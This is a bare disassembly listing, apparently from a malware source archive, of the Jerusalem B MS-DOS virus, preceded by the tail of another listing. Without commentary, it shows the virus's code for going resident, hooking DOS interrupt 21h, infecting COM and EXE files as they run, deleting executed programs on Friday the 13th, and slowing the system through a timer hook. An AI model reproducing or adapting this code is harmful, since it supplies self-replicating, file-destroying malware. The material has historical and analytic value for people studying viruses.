0000:0694 6465 JZ X06FB
0000:0696 6572 JNZ X070A
0000:0698 7A2E JPE X06C8
0000:069A 6578 JNZ X0714
0000:069C 6520 JNZ X06BE
0000:069E 613A JNO X06DA
0000:06A0 6B6F JPO X0711
0000:06A2 6465 JZ X0709
0000:06A4 6572 JNZ X0718
0000:06A6 2E6578 JNZ X0721
0000:06A9 650D JNZ X06B8
0000:06AB 0000 ADD [BX+SI],AL
0000:06AD 0000 ADD [BX+SI],AL
0000:06AF 0000 ADD [BX+SI],AL
0000:06B1 0000 ADD [BX+SI],AL
0000:06B3 0000 ADD [BX+SI],AL
0000:06B5 0000 ADD [BX+SI],AL
0000:06B7 0000 ADD [BX+SI],AL
0000:06B9 0000 ADD [BX+SI],AL
0000:06BB 0000 ADD [BX+SI],AL
0000:06BD 0000 ADD [BX+SI],AL
0000:06BF 0000 ADD [BX+SI],AL
0000:06C1 0000 ADD [BX+SI],AL
0000:06C3 0000 ADD [BX+SI],AL
0000:06C5 0000 ADD [BX+SI],AL
0000:06C7 0000 ADD [BX+SI],AL
0000:06C9 0000 ADD [BX+SI],AL
0000:06CB 0000 ADD [BX+SI],AL
0000:06CD 0000 ADD [BX+SI],AL
0000:06CF 0000 ADD [BX+SI],AL
0000:06D1 0000 ADD [BX+SI],AL
0000:06D3 0000 ADD [BX+SI],AL
0000:06D5 0000 ADD [BX+SI],AL
0000:06D7 0000 ADD [BX+SI],AL
0000:06D9 005718 ADD [BX+018H],DL
0000:06DC 0825 OR [DI],AH
0000:06DE A5 MOVSW
0000:06DF FEC5 INC CH
0000:06E1 07 POP ES
0000:06E2 1E PUSH DS
0000:06E3 0210 ADD DL,[BX+SI]
0000:06E5 07 POP ES
0000:06E6 57 PUSH DI
0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
0000:06EB 0104 ADD [SI],AX
0000:06ED 7F70 JG X075F
"JV.MOC" PAGE 0014
0000:06EF 0010 ADD [BX+SI],DL
0000:06F1 07 POP ES
0000:06F2 1D001C SBB AX,01C00H
0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
0000:06F9 0C1B OR AL,01BH
0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
0000:06FF F24D REPNE DEC BP
0000:0701 360E PUSH CS
0000:0703 0300 ADD AX,[BX+SI]
0000:0705 0000 ADD [BX+SI],AL
0000:0707 00EE ADD DH,CH
0000:0709 002A X0709: ADD [BP+SI],CH
0000:070B 0F POP CS
0000:070C 42 INC DX
0000:070D 01C1 ADD CX,AX
0000:070F 0DB44C OR AX,04CB4H
0000:0712 B000 MOV AL,00H
0000:0714 CD21 X0714: INT 021H
0000:0716 4D DEC BP
0000:0717 7344 JAE X075D
0000:0719 6F73 JG X078E

MSDOS/J-Index/Virus.MSDOS.Unknown.jeru-b.lst
+794
View File
@@ -0,0 +1,794 @@
This is the Jerusalem B Virus.
"JV.MOC" PAGE 0001
0000:0000 E99200 JMP X0095
0000:0003 7355 JAE X005A
0000:0005 4D DEC BP
0000:0006 7344 JAE X004C
0000:0008 6F73 JG X007D
0000:000A 0001 ADD [BX+DI],AL
0000:000C BD1700 MOV BP,0017H
0000:000F 0000 ADD [BX+SI],AL
0000:0011 06 PUSH ES
0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
0000:0016 F016 LOCK PUSH SS
0000:0018 17 POP SS
0000:0019 7702 JA X001D
0000:001B BF053D MOV DI,03D05H
0000:001E 0CFB OR AL,0FBH
0000:0020 7D00 JGE X0022
0000:0022 0000 X0022: ADD [BX+SI],AL
0000:0024 0000 ADD [BX+SI],AL
0000:0026 0000 ADD [BX+SI],AL
0000:0028 0000 ADD [BX+SI],AL
0000:002A 0000 ADD [BX+SI],AL
0000:002C 0000 ADD [BX+SI],AL
0000:002E E8062A CALL X2A37
0000:0031 B10D MOV CL,0DH
0000:0033 800000 ADD BYTE PTR [BX+SI],00H
0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
0000:003A 0D5C00 OR AX,005CH
0000:003D B10D MOV CL,0DH
0000:003F 6C00 JL X0041
0000:0041 B10D X0041: MOV CL,0DH
0000:0043 0004 ADD [SI],AL
0000:0045 5F POP DI
0000:0046 0F POP CS
0000:0047 B400 MOV AH,00H
0000:0049 C1 RET ; INTRASEGMENT
0000:004A 0D00F0 X004A: OR AX,0F000H
0000:004D 06 PUSH ES
0000:004E 004D5A ADD [DI+05AH],CL
0000:0051 2000 AND [BX+SI],AL
0000:0053 1000 ADC [BX+SI],AL
0000:0055 1900 SBB [BX+SI],AX
0000:0057 0800 OR [BX+SI],AL
0000:0059 7500 JNZ X005B
0000:005B 7500 X005B: JNZ X005D
0000:005D 6901 X005D: JNS X0060
0000:005F 1007 ADC [BX],AL
0000:0061 8419 TEST BL,[BX+DI]
0000:0063 C500 LDS AX,[BX+SI]
0000:0065 6901 JNS X0068
0000:0067 1C00 SBB AL,00H
0000:0069 0000 ADD [BX+SI],AL
0000:006B 4C X006B: DEC SP
0000:006C B000 MOV AL,00H
0000:006E CD21 INT 021H
0000:0070 050020 ADD AX,02000H
0000:0073 0037 ADD [BX],DH
"JV.MOC" PAGE 0002
0000:0075 121C ADC BL,[SI]
0000:0077 0100 ADD [BX+SI],AX
0000:0079 0210 ADD DL,[BX+SI]
0000:007B 0010 ADD [BX+SI],DL
0000:007D 17 X007D: POP SS
0000:007E 0000 ADD [BX+SI],AL
0000:0080 53 PUSH BX
0000:0081 61E8 JNO X006B
0000:0083 38434F CMP [BP+DI+04FH],AL
0000:0086 4D DEC BP
0000:0087 4D DEC BP
0000:0088 41 INC CX
0000:0089 4E DEC SI
0000:008A 44 INC SP
0000:008B 2E43 INC BX
0000:008D 4F DEC DI
0000:008E 4D DEC BP
0000:008F 0100 ADD [BX+SI],AX
0000:0091 0000 ADD [BX+SI],AL
0000:0093 0000 ADD [BX+SI],AL
0000:0095 FC X0095: CLD
0000:0096 B4E0 MOV AH,0E0H
0000:0098 CD21 INT 021H
0000:009A 80FCE0 CMP AH,0E0H
0000:009D 7316 JAE X00B5
0000:009F 80FC03 CMP AH,03H
0000:00A2 7211 JB X00B5
0000:00A4 B4DD MOV AH,0DDH
0000:00A6 BF0001 MOV DI,0100H
0000:00A9 BE1007 MOV SI,0710H
0000:00AC 03F7 ADD SI,DI
0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H]
0000:00B3 CD21 INT 021H
0000:00B5 8CC8 X00B5: MOV AX,CS
0000:00B7 051000 ADD AX,0010H
0000:00BA 8ED0 MOV SS,AX
0000:00BC BC0007 MOV SP,0700H
0000:00BF 50 PUSH AX
0000:00C0 B8C500 MOV AX,00C5H
0000:00C3 50 PUSH AX
0000:00C4 CB RET ; INTERSEGMENT
0000:00C5 FC X00C5: CLD
0000:00C6 06 PUSH ES
0000:00C7 2E8C063100 MOV CS:[Y0031H],ES
0000:00CC 2E8C063900 MOV CS:[Y0039H],ES
0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES
0000:00D6 2E8C064100 MOV CS:[Y0041H],ES
0000:00DB 8CC0 MOV AX,ES
0000:00DD 051000 ADD AX,0010H
0000:00E0 2E01064900 ADD CS:[Y0049H],AX
0000:00E5 2E01064500 ADD CS:[Y0045H],AX
0000:00EA B4E0 MOV AH,0E0H
0000:00EC CD21 INT 021H
0000:00EE 80FCE0 CMP AH,0E0H
0000:00F1 7313 JAE X0106
0000:00F3 80FC03 CMP AH,03H
"JV.MOC" PAGE 0003
0000:00F6 07 POP ES
0000:00F7 2E8E164500 MOV SS,CS:[Y0045H]
0000:00FC 2E8B264300 MOV SP,CS:[Y0043H]
0000:0101 2EFF2E4700 JMP CS:[Y0047H]
0000:0106 33C0 X0106: XOR AX,AX
0000:0108 8EC0 MOV ES,AX
0000:010A 26A1FC03 MOV AX,ES:Y03FCH
0000:010E 2EA34B00 MOV CS:Y004BH,AX
0000:0112 26A0FE03 MOV AL,ES:Y03FEH
0000:0116 2EA24D00 MOV CS:Y004DH,AL
0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H
0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH
0000:0127 58 POP AX
0000:0128 051000 ADD AX,0010H
0000:012B 8EC0 MOV ES,AX
0000:012D 0E PUSH CS
0000:012E 1F POP DS
0000:012F B91007 MOV CX,0710H
0000:0132 D1E9 SHR CX,1
0000:0134 33F6 XOR SI,SI
0000:0136 8BFE MOV DI,SI
0000:0138 06 PUSH ES
0000:0139 B84201 MOV AX,0142H
0000:013C 50 PUSH AX
0000:013D EAFC030000 JMP X0000_03FC
0000:0142 8CC8 MOV AX,CS
0000:0144 8ED0 MOV SS,AX
0000:0146 BC0007 MOV SP,0700H
0000:0149 33C0 XOR AX,AX
0000:014B 8ED8 MOV DS,AX
0000:014D 2EA14B00 MOV AX,CS:Y004BH
0000:0151 A3FC03 MOV Y03FCH,AX
0000:0154 2EA04D00 MOV AL,CS:Y004DH
0000:0158 A2FE03 MOV Y03FEH,AL
0000:015B 8BDC MOV BX,SP
0000:015D B104 MOV CL,04H
0000:015F D3EB SHR BX,CL
0000:0161 83C310 ADD BX,0010H
0000:0164 2E891E3300 MOV CS:[Y0033H],BX
0000:0169 B44A MOV AH,04AH
0000:016B 2E8E063100 MOV ES,CS:[Y0031H]
0000:0170 CD21 INT 021H
0000:0172 B82135 MOV AX,03521H
0000:0175 CD21 INT 021H
0000:0177 2E891E1700 MOV CS:[Y0017H],BX
0000:017C 2E8C061900 MOV CS:[Y0019H],ES
0000:0181 0E PUSH CS
0000:0182 1F POP DS
0000:0183 BA5B02 MOV DX,025BH
0000:0186 B82125 MOV AX,02521H
0000:0189 CD21 INT 021H
0000:018B 8E063100 MOV ES,[Y0031H]
0000:018F 268E062C00 MOV ES,ES:[Y002CH]
0000:0194 33FF XOR DI,DI
0000:0196 B9FF7F MOV CX,07FFFH
0000:0199 32C0 XOR AL,AL
"JV.MOC" PAGE 0004
0000:019B F2AE X019B: REPNE SCASB
0000:019D 263805 CMP ES:[DI],AL
0000:01A0 E0F9 LOOPNZ X019B
0000:01A2 8BD7 MOV DX,DI
0000:01A4 83C203 ADD DX,0003H
0000:01A7 B8004B MOV AX,04B00H
0000:01AA 06 PUSH ES
0000:01AB 1F POP DS
0000:01AC 0E PUSH CS
0000:01AD 07 POP ES
0000:01AE BB3500 MOV BX,0035H
0000:01B1 1E PUSH DS
0000:01B2 06 PUSH ES
0000:01B3 50 PUSH AX
0000:01B4 53 PUSH BX
0000:01B5 51 PUSH CX
0000:01B6 52 PUSH DX
0000:01B7 B42A MOV AH,02AH
0000:01B9 CD21 INT 021H
0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H
0000:01C1 81F9C307 CMP CX,07C3H
0000:01C5 7430 JZ X01F7
0000:01C7 3C05 CMP AL,05H
0000:01C9 750D JNZ X01D8
0000:01CB 80FA0D CMP DL,0DH
0000:01CE 7508 JNZ X01D8
0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH]
0000:01D5 EB20 JMP X01F7
0000:01D7 90 NOP
0000:01D8 B80835 X01D8: MOV AX,03508H
0000:01DB CD21 INT 021H
0000:01DD 2E891E1300 MOV CS:[Y0013H],BX
0000:01E2 2E8C061500 MOV CS:[Y0015H],ES
0000:01E7 0E PUSH CS
0000:01E8 1F POP DS
0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H
0000:01EF B80825 MOV AX,02508H
0000:01F2 BA1E02 MOV DX,021EH
0000:01F5 CD21 INT 021H
0000:01F7 5A X01F7: POP DX
0000:01F8 59 POP CX
0000:01F9 5B POP BX
0000:01FA 58 POP AX
0000:01FB 07 POP ES
0000:01FC 1F POP DS
0000:01FD 9C PUSHF
0000:01FE 2EFF1E1700 CALL CS:[Y0017H]
0000:0203 1E PUSH DS
0000:0204 07 POP ES
0000:0205 B449 MOV AH,049H
0000:0207 CD21 INT 021H
0000:0209 B44D MOV AH,04DH
0000:020B CD21 INT 021H
0000:020D B431 MOV AH,031H
0000:020F BA0006 MOV DX,0600H
0000:0212 B104 MOV CL,04H
"JV.MOC" PAGE 0005
0000:0214 D3EA SHR DX,CL
0000:0216 83C210 ADD DX,0010H
0000:0219 CD21 INT 021H
0000:021B 32C0 XOR AL,AL
0000:021D CF IRET
0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H
0000:0224 7517 JNZ X023D
0000:0226 50 PUSH AX
0000:0227 53 PUSH BX
0000:0228 51 PUSH CX
0000:0229 52 PUSH DX
0000:022A 55 PUSH BP
0000:022B B80206 MOV AX,0602H
0000:022E B787 MOV BH,087H
0000:0230 B90505 MOV CX,0505H
0000:0233 BA1010 MOV DX,01010H
0000:0236 CD10 INT 010H
0000:0238 5D POP BP
0000:0239 5A POP DX
0000:023A 59 POP CX
0000:023B 5B POP BX
0000:023C 58 POP AX
0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH]
0000:0242 7512 JNZ X0256
0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H
0000:024B 50 PUSH AX
0000:024C 51 PUSH CX
0000:024D 56 PUSH SI
0000:024E B90140 MOV CX,04001H
0000:0251 F3AC REPE LODSB
0000:0253 5E POP SI
0000:0254 59 POP CX
0000:0255 58 POP AX
0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H]
0000:025B 9C X025B: PUSHF
0000:025C 80FCE0 CMP AH,0E0H
0000:025F 7505 JNZ X0266
0000:0261 B80003 MOV AX,0300H
0000:0264 9D POPF
0000:0265 CF IRET
0000:0266 80FCDD X0266: CMP AH,0DDH
0000:0269 7413 JZ X027E
0000:026B 80FCDE CMP AH,0DEH
0000:026E 7428 JZ X0298
0000:0270 3D004B CMP AX,04B00H
0000:0273 7503 JNZ X0278
0000:0275 E9B400 JMP X032C
0000:0278 9D X0278: POPF
0000:0279 2EFF2E1700 JMP CS:[Y0017H]
0000:027E 58 X027E: POP AX
0000:027F 58 POP AX
0000:0280 B80001 MOV AX,0100H
0000:0283 2EA30A00 MOV CS:Y000AH,AX
0000:0287 58 POP AX
0000:0288 2EA30C00 MOV CS:Y000CH,AX
0000:028C F3A4 REPE MOVSB
"JV.MOC" PAGE 0006
0000:028E 9D POPF
0000:028F 2EA10F00 MOV AX,CS:Y000FH
0000:0293 2EFF2E0A00 JMP CS:[Y000AH]
0000:0298 83C406 X0298: ADD SP,0006H
0000:029B 9D POPF
0000:029C 8CC8 MOV AX,CS
0000:029E 8ED0 MOV SS,AX
0000:02A0 BC1007 MOV SP,0710H
0000:02A3 06 PUSH ES
0000:02A4 06 PUSH ES
0000:02A5 33FF XOR DI,DI
0000:02A7 0E PUSH CS
0000:02A8 07 POP ES
0000:02A9 B91000 MOV CX,0010H
0000:02AC 8BF3 MOV SI,BX
0000:02AE BF2100 MOV DI,0021H
0000:02B1 F3A4 REPE MOVSB
0000:02B3 8CD8 MOV AX,DS
0000:02B5 8EC0 MOV ES,AX
0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH]
0000:02BC 2E03062B00 ADD AX,CS:[Y002BH]
0000:02C1 83D200 ADC DX,0000H
0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH]
0000:02C9 8ED8 MOV DS,AX
0000:02CB 8BF2 MOV SI,DX
0000:02CD 8BFA MOV DI,DX
0000:02CF 8CC5 MOV BP,ES
0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH]
0000:02D6 0BDB OR BX,BX
0000:02D8 7413 JZ X02ED
0000:02DA B90080 X02DA: MOV CX,08000H
0000:02DD F3A5 REPE MOVSW
0000:02DF 050010 ADD AX,01000H
0000:02E2 81C50010 ADD BP,01000H
0000:02E6 8ED8 MOV DS,AX
0000:02E8 8EC5 MOV ES,BP
0000:02EA 4B DEC BX
0000:02EB 75ED JNZ X02DA
0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH]
0000:02F2 F3A4 REPE MOVSB
0000:02F4 58 POP AX
0000:02F5 50 PUSH AX
0000:02F6 051000 ADD AX,0010H
0000:02F9 2E01062900 ADD CS:[Y0029H],AX
0000:02FE 2E01062500 ADD CS:[Y0025H],AX
0000:0303 2EA12100 MOV AX,CS:Y0021H
0000:0307 1F POP DS
0000:0308 07 POP ES
0000:0309 2E8E162900 MOV SS,CS:[Y0029H]
0000:030E 2E8B262700 MOV SP,CS:[Y0027H]
0000:0313 2EFF2E2300 JMP CS:[Y0023H]
0000:0318 33C9 X0318: XOR CX,CX
0000:031A B80143 MOV AX,04301H
0000:031D CD21 INT 021H
0000:031F B441 MOV AH,041H
0000:0321 CD21 INT 021H
"JV.MOC" PAGE 0007
0000:0323 B8004B MOV AX,04B00H
0000:0326 9D POPF
0000:0327 2EFF2E1700 JMP CS:[Y0017H]
0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H
0000:0332 74E4 JZ X0318
0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H
0000:0342 2E89168000 MOV CS:[Y0080H],DX
0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS
0000:034C 50 PUSH AX
0000:034D 53 PUSH BX
0000:034E 51 PUSH CX
0000:034F 52 PUSH DX
0000:0350 56 PUSH SI
0000:0351 57 PUSH DI
0000:0352 1E PUSH DS
0000:0353 06 PUSH ES
0000:0354 FC CLD
0000:0355 8BFA MOV DI,DX
0000:0357 32D2 XOR DL,DL
0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH
0000:035D 7505 JNZ X0364
0000:035F 8A15 MOV DL,[DI]
0000:0361 80E21F AND DL,01FH
0000:0364 B436 X0364: MOV AH,036H
0000:0366 CD21 INT 021H
0000:0368 3DFFFF CMP AX,0FFFFH
0000:036B 7503 JNZ X0370
0000:036D E97702 X036D: JMP X05E7
0000:0370 F7E3 X0370: MUL BX
0000:0372 F7E1 MUL CX
0000:0374 0BD2 OR DX,DX
0000:0376 7505 JNZ X037D
0000:0378 3D1007 CMP AX,0710H
0000:037B 72F0 JB X036D
0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H]
0000:0382 1E PUSH DS
0000:0383 07 POP ES
0000:0384 32C0 XOR AL,AL
0000:0386 B94100 MOV CX,0041H
0000:0389 F2AE REPNE SCASB
0000:038B 2E8B368000 MOV SI,CS:[Y0080H]
0000:0390 8A04 X0390: MOV AL,[SI]
0000:0392 0AC0 OR AL,AL
0000:0394 740E JZ X03A4
0000:0396 3C61 CMP AL,061H
0000:0398 7207 JB X03A1
0000:039A 3C7A CMP AL,07AH
0000:039C 7703 JA X03A1
0000:039E 802C20 SUB BYTE PTR [SI],020H
0000:03A1 46 X03A1: INC SI
0000:03A2 EBEC JMP X0390
0000:03A4 B90B00 X03A4: MOV CX,000BH
0000:03A7 2BF1 SUB SI,CX
0000:03A9 BF8400 MOV DI,0084H
0000:03AC 0E PUSH CS
"JV.MOC" PAGE 0008
0000:03AD 07 POP ES
0000:03AE B90B00 MOV CX,000BH
0000:03B1 F3A6 REPE CMPSB
0000:03B3 7503 JNZ X03B8
0000:03B5 E92F02 JMP X05E7
0000:03B8 B80043 X03B8: MOV AX,04300H
0000:03BB CD21 INT 021H
0000:03BD 7205 JB X03C4
0000:03BF 2E890E7200 MOV CS:[Y0072H],CX
0000:03C4 7225 X03C4: JB X03EB
0000:03C6 32C0 XOR AL,AL
0000:03C8 2EA24E00 MOV CS:Y004EH,AL
0000:03CC 1E PUSH DS
0000:03CD 07 POP ES
0000:03CE 8BFA MOV DI,DX
0000:03D0 B94100 MOV CX,0041H
0000:03D3 F2AE REPNE SCASB
0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH
0000:03D9 740B JZ X03E6
0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH
0000:03DF 7405 JZ X03E6
0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH]
0000:03E6 B8003D X03E6: MOV AX,03D00H
0000:03E9 CD21 INT 021H
0000:03EB 725A X03EB: JB X0447
0000:03ED 2EA37000 MOV CS:Y0070H,AX
0000:03F1 8BD8 MOV BX,AX
0000:03F3 B80242 MOV AX,04202H
0000:03F6 B9FFFF MOV CX,0FFFFH
0000:03F9 BAFBFF MOV DX,0FFFBH
0000:03FC CD21 X03FC: INT 021H
0000:03FE 72EB JB X03EB
0000:0400 050500 ADD AX,0005H
0000:0403 2EA31100 MOV CS:Y0011H,AX
0000:0407 B90500 MOV CX,0005H
0000:040A BA6B00 MOV DX,006BH
0000:040D 8CC8 MOV AX,CS
0000:040F 8ED8 MOV DS,AX
0000:0411 8EC0 MOV ES,AX
0000:0413 B43F MOV AH,03FH
0000:0415 CD21 INT 021H
0000:0417 8BFA MOV DI,DX
0000:0419 BE0500 MOV SI,0005H
0000:041C F3A6 REPE CMPSB
0000:041E 7507 JNZ X0427
0000:0420 B43E MOV AH,03EH
0000:0422 CD21 INT 021H
0000:0424 E9C001 JMP X05E7
0000:0427 B82435 X0427: MOV AX,03524H
0000:042A CD21 INT 021H
0000:042C 891E1B00 MOV [Y001BH],BX
0000:0430 8C061D00 MOV [Y001DH],ES
0000:0434 BA1B02 MOV DX,021BH
0000:0437 B82425 MOV AX,02524H
0000:043A CD21 INT 021H
0000:043C C5168000 LDS DX,[Y0080H]
"JV.MOC" PAGE 0009
0000:0440 33C9 XOR CX,CX
0000:0442 B80143 MOV AX,04301H
0000:0445 CD21 INT 021H
0000:0447 723B X0447: JB X0484
0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:044E B43E MOV AH,03EH
0000:0450 CD21 INT 021H
0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:0459 B8023D MOV AX,03D02H
0000:045C CD21 INT 021H
0000:045E 7224 JB X0484
0000:0460 2EA37000 MOV CS:Y0070H,AX
0000:0464 8CC8 MOV AX,CS
0000:0466 8ED8 MOV DS,AX
0000:0468 8EC0 MOV ES,AX
0000:046A 8B1E7000 MOV BX,[Y0070H]
0000:046E B80057 MOV AX,05700H
0000:0471 CD21 INT 021H
0000:0473 89167400 MOV [Y0074H],DX
0000:0477 890E7600 MOV [Y0076H],CX
0000:047B B80042 MOV AX,04200H
0000:047E 33C9 XOR CX,CX
0000:0480 8BD1 MOV DX,CX
0000:0482 CD21 INT 021H
0000:0484 723D X0484: JB X04C3
0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H
0000:048B 7403 JZ X0490
0000:048D EB57 JMP X04E6
0000:048F 90 NOP
0000:0490 BB0010 X0490: MOV BX,01000H
0000:0493 B448 MOV AH,048H
0000:0495 CD21 INT 021H
0000:0497 730B JAE X04A4
0000:0499 B43E MOV AH,03EH
0000:049B 8B1E7000 MOV BX,[Y0070H]
0000:049F CD21 INT 021H
0000:04A1 E94301 JMP X05E7
0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH]
0000:04A8 8EC0 MOV ES,AX
0000:04AA 33F6 XOR SI,SI
0000:04AC 8BFE MOV DI,SI
0000:04AE B91007 MOV CX,0710H
0000:04B1 F3A4 REPE MOVSB
0000:04B3 8BD7 MOV DX,DI
0000:04B5 8B0E1100 MOV CX,[Y0011H]
0000:04B9 8B1E7000 MOV BX,[Y0070H]
0000:04BD 06 PUSH ES
0000:04BE 1F POP DS
0000:04BF B43F MOV AH,03FH
0000:04C1 CD21 INT 021H
0000:04C3 721C X04C3: JB X04E1
0000:04C5 03F9 ADD DI,CX
0000:04C7 33C9 XOR CX,CX
0000:04C9 8BD1 MOV DX,CX
0000:04CB B80042 MOV AX,04200H
0000:04CE CD21 INT 021H
"JV.MOC" PAGE 0010
0000:04D0 BE0500 MOV SI,0005H
0000:04D3 B90500 MOV CX,0005H
0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT
R (SI)
0000:04D9 8BCF MOV CX,DI
0000:04DB 33D2 XOR DX,DX
0000:04DD B440 MOV AH,040H
0000:04DF CD21 INT 021H
0000:04E1 720D X04E1: JB X04F0
0000:04E3 E9BC00 JMP X05A2
0000:04E6 B91C00 X04E6: MOV CX,001CH
0000:04E9 BA4F00 MOV DX,004FH
0000:04EC B43F MOV AH,03FH
0000:04EE CD21 INT 021H
0000:04F0 724A X04F0: JB X053C
0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H
0000:04F8 A15D00 MOV AX,Y005DH
0000:04FB A34500 MOV Y0045H,AX
0000:04FE A15F00 MOV AX,Y005FH
0000:0501 A34300 MOV Y0043H,AX
0000:0504 A16300 MOV AX,Y0063H
0000:0507 A34700 MOV Y0047H,AX
0000:050A A16500 MOV AX,Y0065H
0000:050D A34900 MOV Y0049H,AX
0000:0510 A15300 MOV AX,Y0053H
0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H
0000:0518 7401 JZ X051B
0000:051A 48 DEC AX
0000:051B F7267800 X051B: MUL WORD PTR [Y0078H]
0000:051F 03065100 ADD AX,[Y0051H]
0000:0523 83D200 ADC DX,0000H
0000:0526 050F00 ADD AX,000FH
0000:0529 83D200 ADC DX,0000H
0000:052C 25F0FF AND AX,0FFF0H
0000:052F A37C00 MOV Y007CH,AX
0000:0532 89167E00 MOV [Y007EH],DX
0000:0536 051007 ADD AX,0710H
0000:0539 83D200 ADC DX,0000H
0000:053C 723A X053C: JB X0578
0000:053E F7367800 DIV WORD PTR [Y0078H]
0000:0542 0BD2 OR DX,DX
0000:0544 7401 JZ X0547
0000:0546 40 INC AX
0000:0547 A35300 X0547: MOV Y0053H,AX
0000:054A 89165100 MOV [Y0051H],DX
0000:054E A17C00 MOV AX,Y007CH
0000:0551 8B167E00 MOV DX,[Y007EH]
0000:0555 F7367A00 DIV WORD PTR [Y007AH]
0000:0559 2B065700 SUB AX,[Y0057H]
0000:055D A36500 MOV Y0065H,AX
0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H
0000:0566 A35D00 MOV Y005DH,AX
0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H
0000:056F 33C9 XOR CX,CX
0000:0571 8BD1 MOV DX,CX
0000:0573 B80042 MOV AX,04200H
0000:0576 CD21 INT 021H
"JV.MOC" PAGE 0011
0000:0578 720A X0578: JB X0584
0000:057A B91C00 MOV CX,001CH
0000:057D BA4F00 MOV DX,004FH
0000:0580 B440 MOV AH,040H
0000:0582 CD21 INT 021H
0000:0584 7211 X0584: JB X0597
0000:0586 3BC1 CMP AX,CX
0000:0588 7518 JNZ X05A2
0000:058A 8B167C00 MOV DX,[Y007CH]
0000:058E 8B0E7E00 MOV CX,[Y007EH]
0000:0592 B80042 MOV AX,04200H
0000:0595 CD21 INT 021H
0000:0597 7209 X0597: JB X05A2
0000:0599 33D2 XOR DX,DX
0000:059B B91007 MOV CX,0710H
0000:059E B440 MOV AH,040H
0000:05A0 CD21 INT 021H
0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H
0000:05A8 7404 JZ X05AE
0000:05AA B449 MOV AH,049H
0000:05AC CD21 INT 021H
0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH
0000:05B4 7431 JZ X05E7
0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:05BB 2E8B167400 MOV DX,CS:[Y0074H]
0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H]
0000:05C5 B80157 MOV AX,05701H
0000:05C8 CD21 INT 021H
0000:05CA B43E MOV AH,03EH
0000:05CC CD21 INT 021H
0000:05CE 2EC5168000 LDS DX,CS:[Y0080H]
0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H]
0000:05D8 B80143 MOV AX,04301H
0000:05DB CD21 INT 021H
0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH]
0000:05E2 B82425 MOV AX,02524H
0000:05E5 CD21 INT 021H
0000:05E7 07 X05E7: POP ES
0000:05E8 1F POP DS
0000:05E9 5F POP DI
0000:05EA 5E POP SI
0000:05EB 5A POP DX
0000:05EC 59 POP CX
0000:05ED 5B POP BX
0000:05EE 58 POP AX
0000:05EF 9D POPF
0000:05F0 2EFF2E1700 JMP CS:[Y0017H]
0000:05F5 0000 X05F5: ADD [BX+SI],AL
0000:05F7 0000 ADD [BX+SI],AL
0000:05F9 0000 ADD [BX+SI],AL
0000:05FB 0000 ADD [BX+SI],AL
0000:05FD 0000 ADD [BX+SI],AL
0000:05FF 004D00 ADD [DI+00H],CL
0000:0602 000F ADD [BX],CL
0000:0604 0000 ADD [BX+SI],AL
0000:0606 0000 ADD [BX+SI],AL
"JV.MOC" PAGE 0012
0000:0608 0000 ADD [BX+SI],AL
0000:060A 0000 ADD [BX+SI],AL
0000:060C 0000 ADD [BX+SI],AL
0000:060E 0000 ADD [BX+SI],AL
0000:0610 CD20 INT 020H
0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH
0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID
0000:0619 F02F LOCK DAS
0000:061B 018E1E3C ADD [BP+Y03C1EH],CX
0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX
0000:0623 048E ADD AL,08EH
0000:0625 1E PUSH DS
0000:0626 8E1EFFFF MOV DS,[Y0FFFFH]
0000:062A FFFF ??? DI
0000:062C FFFF ??? DI
0000:062E FFFF ??? DI
0000:0630 FFFF ??? DI
0000:0632 FFFF ??? DI
0000:0634 FFFF ??? DI
0000:0636 FFFF ??? DI
0000:0638 FFFF ??? DI
0000:063A FFFF ??? DI
0000:063C 7C1F JL X065D
0000:063E DE3E8D29 ESC 037H,[Y0298DH]
0000:0642 1400 ADC AL,00H
0000:0644 1800 SBB [BX+SI],AL
